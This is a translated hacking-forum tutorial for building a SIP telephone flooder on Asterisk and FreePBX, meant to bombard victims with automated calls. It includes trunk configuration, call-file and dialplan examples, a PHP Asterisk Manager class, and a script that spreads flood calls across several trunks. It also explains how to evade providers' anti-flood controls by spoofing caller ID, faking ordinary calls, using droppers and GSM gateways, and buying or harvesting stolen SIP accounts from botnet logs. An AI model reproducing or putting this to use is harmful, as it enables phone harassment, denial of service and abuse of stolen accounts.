Report post
Posted December 1, 2017 (edited)
316kg38.png
Table of contents
:snooks: Introduction
:snooks: Installing and configuring Asterisk in 5 minutes with the GUI interface
:snooks: SIP Phone Flood
:snooks: Bypassing SIP providers’ anti-flood protections
Introduction.
Very often there are threads on the forum about telephone flooding. The topic is ancient, but still relevant. In this case, the software, which lies in the public and allows you to flood through the SIP is so crooked that sometimes wonder how he still manages to sell… Well, bypassing the anti-flood protection there is out of the question. I propose to correct this situation. Article aimed mainly at beginners, as well as people who are only slightly familiar with the concept of sip telephony. Old-timers please do not kick, but for you here will be interesting info at the end of the article on the subject – avoiding bans from sip operators for flooding. I also want to note that the method and code below fully working and tested in combat conditions.
To work we will need:
a) Basic knowledge of linux…
b) Basic knowledge of any language. I will show you the example of php, although in general you can implement everything, even just a script in bash.
c) Straight hands and a little patience.
I do not see the point in describing how the SIP protocol works. For a complete description you need not an article, but a book. Besides, I think that it makes no sense to write everything from scratch. Fortunately we have at hand a handy and tried and tested for decades – Asterisk. Asterisk is a server for voip telephony. This is a stable product, which is often seen in small online stores and even in banks. Any of us have experienced a call to tech support where a nice robot voice asks us to stay on the line. In 99% of any ivr menu is spinning on asterisk. At the same time it has a very extensive functionality, but for our flooder will be enough 5-10% of the basic functions.
So first we will need to take a few steps:
a) Install and configure Asterisk.
b) Understand how to make automatic calls with Asterisk.
c) Bypass sip providers’ bans.
Installation and Config.
In fact, asterisk itself is quite a hackneyed product. Experienced Linux admins can skip this part, because everything will be trivial, but you will have to sweat the small stuff. Lots of modules, an even bigger pile of dependencies. Building by hand from source is not a problem for an experienced administrator, but it is a pain in the ass for a newbie. And if you are not even familiar with linux, it will be something from the series of “Misssion Impossible”. Many newbies go straight to google with the request “centos 6 install asterisk”, get a bunch of articles with supposedly step-by-step installation a la type copied commands. Usually these articles are old, you will have a lot of problems with dependencies, but even if you succeed at the N-th article, it may be an ambush here too. Often the installation in such articles contains not official scripts, but third party ones. For example, at least twice have seen scripts to install freepbx, which in the process also leave a couple of backdoors. And often you can see tips like “disable firewall”, “selinux” and so on. The result of this will also shel and drained your balance from the voip provider. It is only a question of time.
But there is a very simple solution. Fortunately, asterisk developers worked hard and made a ready-made iso for installation. This miracle is called AsteriskNow. Installation level of complexity is no more than a one-group friend’s windows reinstallation. This will be configured firewall, fail2ban. Vicious Chinese brokers will not pass)))) Also, asterisk itself implies a more hardcore config. Everything is done in the configuration files and there are hundreds of them… If you install it for the first time, prepare to spend at least a week, delving into the documentation and structure. But there is a solution even here – FreePbx. Gui admin panel, where everything is nice and “on buttons” and with graphs and pictures. That’s what we need, especially taking into account that FreePBX is by default in AsteriskNow, that we will install. Here we go:
First of all we will buy a VPS. The only prerequisite is a panel that will allow us to load our iso from AsteriskNow and start from it. I recommend – https://hostsailor.com/
VPS with at least 2GB RAM (better 2GB). After registration and payment (they also support Bitcoin) we will get an e-mail with necessary data for login. We are not interested in ssh, but we need a panel – Control Panel. There will be a link to it and a random login and pass. Go there.
The next step is to go to the bottom panel to CDRom, where you can mount iso. The last AsteriskNow image there is already added by default, so select it and click mount.
2ut41mr.png
Next, go to Settings and change the Boot Order to boot from CDRom first.
11w7h9e.png
Reboot the server. Next we need to connect via VNC and go through a simple GUI OS setup. The same panel has the data for VNC, but there is also a built in HTML5 VNC Viewer. We use it and go straight to the AsteriskNow installation menu.
28h0mci.png
Select Full Install. Enter the rest by default (the password you entered during the installation will be your ssh password) and go make coffee. In min. 5 minutes later everything will be ready. After that, go back to the panel. Remove our iso, boot from HDD first and reboot again. Next our modules will be updated in about 5 minutes.
2em0poy.png
Wait for the installation to complete in VNC. After that, just go to our server ip in the browser and get into the Freepbx admin area. Enter your username, password and recovery email. Skip all the ads and offers and voila everything is ready. It would be nice to change asterisk manager default passwords. Also there is a possible bug in php mbstring dependency (can be cleaned by installing via vnc or ssh). After we have done everything we get into a nice admin panel with graphs, blackjack and whores.
xcu5qt.png
So we have installed asterisk itself. Let’s make its configuration. First we need a sip provider. In my example we will use zadarma (just had a couple of dollars left over). Use it only for first system setup test. For flooding they are 100% unsuitable. There’s pretty good anti-flood control and you will be banned almost immediately. Allowed except for one-time test calls in the development process and that to your number. You can use your sip provider, settings will not differ significantly. So, first, go to Connectivity – Trunks. Then we add Sip trunk.
The settings are as follows –
Spoiler
Trunk Name zadarma
PEER Details
host=sip.zadarma.com
insecure=invite
type=friend
fromdomain=sip.zadarma.com
disallow=all
allow=alaw&ulaw
dtmfmode=auto
secret=password
defaultuser=111111
fromuser=111111
qualify=400
directmedia=no
nat=force_rport,comedia
USER Context 111111
USER Details
host=sip.zadarma.com
insecure=invite
type=friend
fromdomain=sip.zadarma.com
disallow=all
allow=alaw&ulaw
dtmfmode=auto
secret=password
defaultuser=111111
fromuser=111111
qualify=400
directmedia=no
nat=force_rport,comedia
Register String
111111:password@sip.zadarma.com/111111
jfuoah.png
2rdclyp.png
15rh8nr.png
Naturally, 111111 is your sip id, password is your sip id password, also in case of another sip provider change host,fromdomain and url in Registration String.
After that go back to Reports -> System Status and you should now see in the graph active registration of your trunk (do not forget to Apply Changes, because many changes require a reboot of the asterisk core).
2uzw7km.png
Flooding…
It’s time to get to the main part of this article. We have a powerful tool in the form of an asterisk server. Now it remains for us to figure out how the outgoing calls are made and how to automate it all. Do you think it’s time to dive into the maze of sip protocol, invites, redirects, etc.? There is no need to rack your brains, because our aresenal has call files. You have probably ran into them when you received a verify call at some boring service, where the robot called you and read your password or asked to confirm your identity by pressing 1. Most likely it is done with the help of these magic files.
Call files are text asterisk configuration files, which contain instructions on what trunk to call, where to call, as well as what action to direct our call strategy. In order to make an automatic outgoing call you just need to create a file with the extension .call and with a certain content and then put it in the /var/spool/asterisk/outgoing/ folder
This is actually a .txt file with its own structure and extension .call. You can read full documentation about it on asterisk, but let’s have a quick look at the basic functionality of the fluder for example with standard call file:
Channel: SIP/zadarma/111111111111
Callerid: 222222222222
Context: context
Extension: s
Set: variable=test
In Channel we pass to where we want to call: the SIP protocol. Then we specify the desired trunk (we can have many trunks). And at the end of the phone number to which the call will go (usually in international format without +, but it depends on your provider).
CallerID – the number which is transmitted in the substitution. Not all providers support it. That is, asterisk transmits the one that you specify here, but then the sip provider itself can cut it.
Context – where to let the call. The asterisk file extensions.conf manages call strategies. All macros and actions to be during the call are prescribed there. The functionality is enormous. Let’s say you need the calls from the U.S. to go strictly to a certain operator? It is specified here… Or maybe you want a certain melody to play when you pick up the phone? Again, welcome to extensions.conf. We will describe all its functionality later, although we need 1-3 commands at most for a regular flooder.
Extension – a place in the macro specified in the context from which to start doing actions. In our case, do not focus your attention and just specify s (which means default).
Set: variable=test It is possible to pass some of your variables to the dialplan. In our case, variable with value test. It is useful when you need to pass something dynamically. For example to specify the waiting time of answering the receiver for a definite telephone or to play not simply a melody, but something special. In fact, you will not need it for usual flooder, but it is irreplaceable for some cool stuff))))
We took the structure itself apart. As you can see, all we’re missing is Context. A macro with instructions for our robot what to do when making a call. Open the file /etc/asterisk/extensions.conf Go down to the very bottom (it is important at the very bottom) and write our first macro.
[flooder]
exten => s,1,Hangup()
As you can see the structure is as follows:
exten => beginning of any instruction
s – extension. S stands for unset, i.e. default. If you go back to the place with the call file description, that is what is specified in the extension instruction. Specify just s.
1 – priority. Each action has its own priority. That is the number tells the asterisk where to start. Asterisk executes commands starting with a lower priority and going up. If you don’t understand, you will understand in the more complex example below.
Hangup() is the function itself. Specifically this one means hangup.
As we see our macro just hangs up until it is picked up and if it is picked up it hangs down (the maximum duration of the call can be specified globally in the admin or in the call file). Can you think of something a little more complicated? Easy –
exten => s,1,SendDTMF(1,1000,100) // press 1 after 1000 milliseconds (seconds) with a press depth of 100 milliseconds
exten => s,2,Playback(melody) playback the audio file melody, which should be in the folder /var/lib/asterisk/sounds. Note that only name without extension is needed.
exten => s,3,Wait(${WAITIME}) // wait for specified amount of time. ${WAITIME} is a variable that we can send through the call file Set: WAITIME=10
exten => s,4,Hangup()
After each save of extensions.conf you also need to restart the kernel modules so that the changes take effect. This is done with an amportal restart command or by restarting the entire server.
As a start, I suggest creating a simple macro at the very end of extensions.conf. Now create a test .call file and just put it in /var/spool/asterisk/outgoing/ Don’t forget to specify in it your phone, callerID, new macro (instead of context). If you’ve done everything correctly, then asterisk will remove the call file and make the call right away. An interesting feature is that you can schedule a call later. To do this just change the modification date of your call file (don’t forget that the server might have a different time zone). In this case the call will go only when the modification date will come. If the call didn’t go, then somewhere you’ve made a mistake and here it’s time to learn all the debugging benefits. Type in ssh asterisk -r and you will get to the cli menu of asterisk management. Then type core set verbose 10 which will make the log more detailed. Then make a call through the call file and look for errors. It is unlikely you will have anything unique in the errors, so “may the power of Google be with you”.
To summarize, you can quickly sketch a simple script that will create a call file, wait for a while and run it again in a circle. In fact, the basic functionality of the core of the flooder is ready. Of course it would be nice to write more admin, dynamically insert callerID for swapping, send different dtmf if you flood some services, and so on. But this is already nuances.
Get ban from SIP provider.
It’s time to move on to the cons of this whole system. Our flooder will work like clockwork, the calls will go like clockwork, the victims will smash their phones against the walls until….. Until the sip provider blocks you. And it’s not about abuses (although it’s also about them). First of all, the ISP does not benefit from it. It loads their system resources. In addition, often strip providers are only resellers who buy routers from large and not very operators. Each router (let’s say a route of calls to the U.S.) have parameters – ASR and ABR. In fact, the percentage of answered calls to the total number of calls is calculated. As you understand you will have a lot of undialed calls and the parameter will start to sag. The operator will fuck the provider, and he will fuck you. And it is very unprofitable for the operator, so as a rule he already fucked his providers more than once a fuckload of years ago. And almost all the providers have automatic anti-flood control, which keeps track of the slightest subsidence ASR (and other parameters!) And depending on the provo or temporarily bans or highlights and sends to the manual moderation of your sip account. In general, it is unlikely you will find a provider without antiflood control … But is it possible that all you did above in vain? Hahaha, no of course not and today is not April 1st. Let’s move on to the main point of the article, which will already be of interest to more experienced comrades))).
Ways to bypass antiflood control:
a) Work not through sip providers and directly with the iron.
b) Dynamic distribution of calls to different trunks.
a) The option of working directly with the hardware will not be considered here in detail. I can note that a goip gsm gateway can be easily connected to this system. GOIP for 4 sims will not cause suspicion with the OPPOSA, but of course, that is just idiocy to put it in your place. In addition, I hope you plan to flood, and it already implies a dropper, who can be trusted equipment for $ 100 +, a permanent way to sim, as well as OPCOSES also do not like the flood and will banish sims periodically.
b) And here is more interesting. If you read the article carefully, you realized that for each provider can have your own trunk. Moreover, the provider can create more than 1 account and also connect each to a different trunk. Also, in the same call files you can specify the trunk, through which we carry out an outgoing call. And consequently they can easily alternate. Also, I advise you not to reset the call immediately, it is better to wait for some random time. It is also not bad and make an emulation of a real person, making calls to their own numbers and playing pre-prepared audio. Often calls to the U.S., let’s say, cost a penny, and you can easily incur these costs. In this case, the chance of getting banned is quite low. And if you also automate the registration process, then the number of such accounts can be bred an incredible set and, respectively, reduce the ban to zero. In addition, botnet owners can simply make a list of the top 100 sip companies and simply search for them in their logs. Believe me you will be surprised. Also, if you don’t have a botnet, on many forums you can buy the links you need for shekels from botnet owners. Often they are not in demand.
To summarize the basic rules:
a) Distribute the flooding to different sip providers.
b) Simulate real calls in parallel.
c) Don’t extinguish the ASR too much by not immediately dropping the call.
The main problem will be the alternation of calls. Some will be dropped, some may be active if the victim will pick up the phone on purpose, hoping to burn all your funds. A simple sleep(); in the script and such primitive interleaving will quickly get you banned. You have to dynamically catch the running calls by threads and start them by timer and pre-defined rules. Here I will help you by giving you a ready-made class and describing a small part of the code for dynamically paralleling flood processes.
So: asterisk has an interesting feature such as Asterisk Manager. It is a cli interface, which we got when we tried to debug errors in our call files (recall asterisk -r). With it you can perform basic operations with Asterisk core modules. By default, Asterisk Manager is available at 127.0.0.1:5038 and with a default username:password of admin:amp111 (unless you changed it during reinstallation in Freepbx). Anyway, here is a simple class for this functionality:
Asterisk Manager class
Spoiler alert
socket = FALSE;
$this->error = “”;
}
function Login($host=”localhost”, $username=”admin”, $password=”amp111″){
$this->socket = @fsockopen(“127.0.0.1”, “5038”, $errno, $errstr, 1)
if (!$this->socket) {
$this->error = “Could not connect – $errstr ($errno)”;
return FALSE;
}else{
stream_set_timeout($this->socket, 1)
$wrets = $this->Query(“Action: Login\r\nUserName: $username\r\nSecret: $password\r\nEvents: off\r\n\r\n”)
if (strpos($wrets, “Message: Authentication accepted”) != FALSE){
return true;
}else{
$this->error = “Could not login – Authentication failed;
fclose($this->socket)
$this->socket = FALSE;
return FALSE;
}
}
}
function Logout(){
if ($this->socket){
fputs($this->socket, “Action: Logoff\r\n\r\n”);
$wrets = ”;
while (!feof($this->socket)) {
$wrets .= fread($this->socket, 8192)
}
fclose($this->socket)
$this->socket = “FALSE”;
}
return
}
function Query($query){
$wrets = “”;
if ($this->socket === FALSE)
return FALSE;
fputs($this->socket, $query)
do
{
$line = fgets($this->socket, 4096);
$wrets .= $line;
$info = stream_get_meta_data($this->socket);
}while ($line != “\r\n” && $info[‘timed_out’] == false );
return $wrets;
}
function GetError(){
return $this->error;
}
function GetDB($family, $key){
$value = “”;
$wrets = $this->Query(“Action: Command\r\nCommand: database get $family $key\r\n\r\n”);
if ($wrets){
$value_start = strpos($wrets, “Value: “) + 7;
$value_stop = strpos($wrets, “\n”, $value_start);
if ($value_start > 8){
$value = substr($wrets, $value_start, $value_stop – $value_start);
}
}
return $value;
}
function PutDB($family, $key, $value){
$wrets = $this->Query(“Action: Command\r\nCommand: database put $family $key $value\r\n\r\n”);
if (strpos($wrets, “Updated database successfully”) != FALSE){
return TRUE;
}
$this->error = “Could not updated database”;
return FALSE;
}
function DelDB($family, $key){
$wrets = $this->Query(“Action: Command\r\nCommand: database del $family $key\r\n\r\n”);
if (strpos($wrets, “Database entry removed.”) != FALSE){
return TRUE;
}
$this->error = “Database entry does not exist;
return FALSE;
}
function GetFamilyDB($family){
$wrets = $this->Query(“Action: Command\r\nCommand: database show $family\r\n\r\n”);
if ($wrets){
$value_start = strpos($wrets, “Response: Follows\r\n”) + 19;
$value_stop = strpos($wrets, “–END COMMAND–\r\n”, $value_start);
if ($value_start > 18){
$wrets = substr($wrets, $value_start, $value_stop – $value_start);
}
$lines = explode(“\n”, $wrets);
foreach($lines as $line){
if (strlen($line) > 4){
$value_start = strpos($line, “: “) + 2;
$value_stop = strpos($line, ” “, $value_start);
$key = trim(substr($line, strlen($family) + 2, strpos($line, ” “) – strlen($family) + 2))
$value[$key] = trim(substr($line, $value_start))
}
}
return $value;
}
return FALSE;
}
}
?>
I’m not going to analyze everything line by line. If you need details, you can find documentation about Asterisk Manager, its base, etc. on google. Here is a small example of my class with a description:
$ami = new AstMan(); // create an object
$a = $ami->Login(); // log in – login and password are default in the class in the method login
$b = $ami->Query(“ACTION: COMMAND\r\n”); // indicate that the next action is a command
$c = $ami->Query(“command: sip reload\r\n\r\n”); // the sip reload command itself reloads the core sip module
$b = $ami->Query(“ACTION: COMMAND\r\n”)
$d = $ami->Query(“command: dialplan reload\r\n\r\n”); // reloads dialplan in extensions.conf
$b = $ami->Query(“ACTION: COMMAND\r\n”);
$e = $ami->Query(“command: sip show peers\r\n\r\n”); // displays peers
$f = $ami->Logout();
In the variables the result is displayed. You can see it with echo, but it’s the same as if you typed these commands in the cli menu – asterisk -r
You understand the principle of the class. Now let’s try to realize how many calls hangs on which trunk and accordingly get the possibility to parallele them.
Example code for paralleling calls by trunks
Spoiler alert
function get_calls($ami){
$b = $ami->Query(“ACTION: COMMAND\r\n”);
$c = $ami->Query(“command: core show Channels\r\n\r\n”);
$parse = explode(PHP_EOL, $c);
foreach ($parse as $a_calls){
if (strpos($a_calls, ‘active channel’)){
$calls = explode(‘ ‘, $a_calls);
$active_calls = $calls[0];
return $active_calls;
}
}
}
function getTrunk($ami){
$trunk_array = parse_ini_file(“trunk.ini”);
$b = $ami->Query(“ACTION: COMMAND\r\n”);
$c = $ami->Query(“command: core show Channels\r\n\r\n”);
echo “Total number of active calls:
“;
foreach ($trunk_array as $k=>$i) {
$count = substr_count($c, $k);
echo “$k = $count
“;
}
ob_flush();
foreach ($trunk_array as $k=>$i) {
$count = substr_count($c, $k);
if($count < $i){
echo "Найден транк $k... Запускаем...
“;
ob_flush();
$trunk = $k;
return $trunk;
}else{
$trunk = ”;
}
}
return $trunk;
}
$ami = new AstMan();
$a = $ami->Login();
while($proceed)){
$trunk = ”;
echo “
ID: “.$id.” Call “.$phone.”…..
“;
while(!$trunk){
ob_flush();
$trunk = getTrunk($ami);
if(!$trunk){
echo “All trunks are busy… Wait 5 seconds
.”
ob_flush();
sleep(5);
}
}
ob_flush();
$call_file = “Channel: SIP/$trunk/$phone. PHP_EOL .
‘Callerid: ‘ . $clid . PHP_EOL .
“Context: $context”. PHP_EOL .
“Extension: s”. PHP_EOL;
file_put_contents(“/var/spool/asterisk/outgoing/potok$i.call”,$call_file);
echo “ID: $id >>>> The call to the caller with phone number $phone and name $name has completed successfully
“;
}
$ami->Logout();
ob_end_flush();
This is just an example of functionality for determining the number of threads. The configuration is set in the trunk.ini file, where we set for which trunk how many active calls to run. So, when limit is exceeded, script will freeze on sleep(5) and will update info through Asterisk Manager until free space is available. This clipping from the working fluder + it specifically made a couple of errors from fools, but the basic principle, I think you’ll understand.
I would recommend adding the following:
1) Work with the base.
2) Creating rules and call statistics for each trunk.
3) Imitation of calls to their numbers, in case ASR for some trunk drops. ASR read by itself and save in the database.
Total with this scheme sip flood will work 100% stable with a minimum number of bans. If you do not lose too much ASR and dilute the logs with different numbers, then the sip providers will not claim. Also, each provider should have their own rules. Here only by experience. Also, I advise against taking rub companies. They are loaded in the trash and there are strict restrictions. Well come on small de, nl proves. If you intend to create as a service, but not for personal use, I advise to appeal to the sip operators directly (not to the providers). There will have to make a deposit of $ 100-500, and this deposit will need to use once a month, but the restrictions will not be as rigid. Well, I advise to look for links in the logs, it is often much easier and more profitable than to register all on their own + there is usually a good balance and if properly used accounts will live long.